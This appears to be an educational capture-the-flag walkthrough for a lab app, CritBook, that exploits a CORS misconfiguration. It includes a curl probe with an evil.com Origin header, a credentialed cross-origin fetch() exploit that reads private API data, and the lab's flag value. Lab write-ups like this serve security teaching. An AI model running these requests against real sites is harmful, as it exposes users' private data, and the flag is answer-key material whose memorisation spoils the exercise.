HACKR.GG
hackr.gg — CritBook — CORS Misconfiguration Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

CritBook — CORS Misconfiguration

CORS Misconfiguration · CORS Misconfiguration
Difficulty
Intermediate
Vuln class
CORS Misconfiguration
Steps
3
// Objective
Exploit a CORS misconfiguration to read the victim's private API data from a cross-origin page.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Test CORS policy
Send a credentialed cross-origin request to the API and check the response headers.
Command / Input
curl http://TARGET/api/me -H "Origin: https://evil.com" -H "Cookie: session=sess_alice_token" -v 2>&1 | grep -i "access-control"
Output
Access-Control-Allow-Origin: https://evil.com Access-Control-Allow-Credentials: true
Wildcard + credentials is blocked by browsers, but reflecting the origin is almost as bad.
2
Craft the cross-origin exploit
Host a page on any origin that makes a credentialed fetch to the CritBook API. The reflected CORS header allows the response to be read.
Command / Input
fetch("http://TARGET/api/me", {credentials:"include"}) .then(r=>r.json()).then(d=>console.log(d))
3
Retrieve the flag
The API response includes the user's private data and the flag.
Command / Input
curl http://TARGET/api/me -H "Cookie: session=sess_alice_token"
Output
{"user":"alice","flag":"HackrGG{c0rs_cr3d3nt14ls_st0l3n_cr1tb00k}","private_posts":[...]}
// Flag
Flag value
HackrGG{c0rs_cr3d3nt14ls_st0l3n_cr1tb00k}
In the /api/me response — readable cross-origin due to the reflected CORS header.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute